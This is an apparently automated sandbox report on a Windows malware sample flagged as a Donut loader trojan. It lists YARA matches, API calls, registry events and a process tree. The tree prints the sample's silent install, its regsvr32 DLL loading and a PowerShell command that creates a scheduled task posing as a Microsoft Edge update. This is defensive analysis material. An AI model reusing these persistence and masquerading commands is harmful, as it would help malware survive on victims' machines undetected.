Source: unknownNetwork traffic detected: HTTP traffic on port 53351 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53276
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53353
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53242
Source: unknownNetwork traffic detected: HTTP traffic on port 53340 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53340
Source: unknownNetwork traffic detected: HTTP traffic on port 53058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53209 -> 443

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 7.2.regsvr32.exe.4f812d5.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2917895885.000000000429F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C874C20 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,7_2_6C874C20
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C876890 NtQueryInformationProcess,NtQueryInformationProcess,7_2_6C876890
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C856300 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,RtlAddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtTraceControl,NtSetContextThread,NtClose,7_2_6C856300
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8F0790 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,GetConsoleMode,GetFileType,memset,GetFileInformationByHandleEx,7_2_6C8F0790
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04FA189C NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,7_2_04FA189C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C874C20 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,14_2_6C874C20
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C876890 NtQueryInformationProcess,NtQueryInformationProcess,14_2_6C876890
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8F0790 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,GetConsoleMode,GetFileType,memset,GetFileInformationByHandleEx,14_2_6C8F0790
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C856300 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose,14_2_6C856300
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8F3C947_2_6C8F3C94
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C855C307_2_6C855C30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8F26D07_2_6C8F26D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8543E07_2_6C8543E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8563007_2_6C856300
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C89DCB07_2_6C89DCB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C85ECF07_2_6C85ECF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C872D807_2_6C872D80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C926DC07_2_6C926DC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C896D507_2_6C896D50
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C880E807_2_6C880E80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C89EE007_2_6C89EE00
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C934E207_2_6C934E20
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8A7F807_2_6C8A7F80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8C9FC07_2_6C8C9FC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C85EFD07_2_6C85EFD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8EC8C07_2_6C8EC8C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C9328C07_2_6C9328C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8808D07_2_6C8808D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8598E07_2_6C8598E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8E983E7_2_6C8E983E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8968307_2_6C896830
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C87E8707_2_6C87E870
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C9429947_2_6C942994
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C9279B07_2_6C9279B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C9469D07_2_6C9469D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C944A907_2_6C944A90
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C871AF07_2_6C871AF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C873A407_2_6C873A40
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C85EA607_2_6C85EA60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8734107_2_6C873410
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8A95407_2_6C8A9540
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C92D6E07_2_6C92D6E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C85E7C07_2_6C85E7C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8727507_2_6C872750
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C9217607_2_6C921760
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C93C0A07_2_6C93C0A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8951807_2_6C895180
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C9291517_2_6C929151
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8721507_2_6C872150
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8F91707_2_6C8F9170
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C9422807_2_6C942280
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8602507_2_6C860250
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C86D3A07_2_6C86D3A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C92E3307_2_6C92E330
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C93A3307_2_6C93A330
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C92D3607_2_6C92D360
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_026411FF7_2_026411FF
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_0263B6A67_2_0263B6A6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_026417507_2_02641750
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_026324B07_2_026324B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_02640CAE7_2_02640CAE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_02642D617_2_02642D61
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04FA189C7_2_04FA189C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F934367_2_04F93436
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F9E5F07_2_04F9E5F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F9B6377_2_04F9B637
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F9F0A47_2_04F9F0A4
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F9E1C07_2_04F9E1C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F913837_2_04F91383
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F9DDE47_2_04F9DDE4
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F8BD7B7_2_04F8BD7B
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F91E257_2_04F91E25
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F9CF087_2_04F9CF08
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F918D47_2_04F918D4
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F82B857_2_04F82B85
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_076805608_2_07680560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0273B62810_2_0273B628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0273B61810_2_0273B618
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_02731D0F10_2_02731D0F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08093EA010_2_08093EA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8F3C9414_2_6C8F3C94
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8F26D014_2_6C8F26D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8543E014_2_6C8543E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C89DCB014_2_6C89DCB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C85ECF014_2_6C85ECF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C855C3014_2_6C855C30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C872D8014_2_6C872D80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C926DC014_2_6C926DC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C880E8014_2_6C880E80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C89EE0014_2_6C89EE00
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C934E2014_2_6C934E20
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8A7F8014_2_6C8A7F80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8C9FC014_2_6C8C9FC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C85EFD014_2_6C85EFD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8EC8C014_2_6C8EC8C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C9328C014_2_6C9328C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8808D014_2_6C8808D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8598E014_2_6C8598E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8E983E14_2_6C8E983E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C87E87014_2_6C87E870
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C94299414_2_6C942994
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C9279B014_2_6C9279B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C9469D014_2_6C9469D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C944A9014_2_6C944A90
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C871AF014_2_6C871AF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C873A4014_2_6C873A40
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C85EA6014_2_6C85EA60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C87341014_2_6C873410
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8A954014_2_6C8A9540
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C92D6E014_2_6C92D6E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C85E7C014_2_6C85E7C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C87275014_2_6C872750
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C92176014_2_6C921760
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C93C0A014_2_6C93C0A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C92915114_2_6C929151
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C87215014_2_6C872150
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8F917014_2_6C8F9170
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C94228014_2_6C942280
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C86025014_2_6C860250
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C86D3A014_2_6C86D3A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C85630014_2_6C856300
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C92E33014_2_6C92E330
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C93A33014_2_6C93A330
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C92D36014_2_6C92D360
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6C92F760 appears 47 times
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6C930400 appears 949 times
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6C92C280 appears 146 times
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6C92C600 appears 94 times
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6C92BDF0 appears 110 times
Source: eXIHsSYhOX.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: eXIHsSYhOX.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-L5KBT.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-L5KBT.tmp.6.drStatic PE information: Number of sections : 11 > 10
Source: eXIHsSYhOX.exeStatic PE information: Number of sections : 11 > 10
Source: eXIHsSYhOX.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: eXIHsSYhOX.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: eXIHsSYhOX.exe, 00000000.00000003.1660219416.00000000035DF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs eXIHsSYhOX.exe
Source: eXIHsSYhOX.exe, 00000000.00000000.1658476171.00000000007A9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs eXIHsSYhOX.exe
Source: eXIHsSYhOX.exe, 00000000.00000003.1660568722.000000007F3AB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs eXIHsSYhOX.exe
Source: eXIHsSYhOX.exeBinary or memory string: OriginalFileName vs eXIHsSYhOX.exe
Source: eXIHsSYhOX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 7.2.regsvr32.exe.4f812d5.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2917895885.000000000429F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engineClassification label: mal100.evad.winEXE@26/22@1/2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C86FCE0 memset,FindFirstVolumeW,memcpy,FindNextVolumeW,memcpy,FindVolumeClose,GetDiskFreeSpaceExW,7_2_6C86FCE0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C861B10 CoCreateInstance,7_2_6C861B10
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpFile created: C:\Users\user\AppData\Local\unins000.datJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\MUTEX
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeFile created: C:\Users\user\AppData\Local\Temp\is-TIG80.tmpJump to behavior
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: eXIHsSYhOX.exeVirustotal: Detection: 52%
Source: eXIHsSYhOX.exeReversingLabs: Detection: 44%
Source: eXIHsSYhOX.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeFile read: C:\Users\user\Desktop\eXIHsSYhOX.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\eXIHsSYhOX.exe "C:\Users\user\Desktop\eXIHsSYhOX.exe"
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp "C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp" /SL5="$2048C,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\eXIHsSYhOX.exe "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp "C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp" /SL5="$304E8,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll"
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp "C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp" /SL5="$2048C,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\eXIHsSYhOX.exe "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp "C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp" /SL5="$304E8,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll"Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeSection loaded: uxtheme.dllJump to behavior
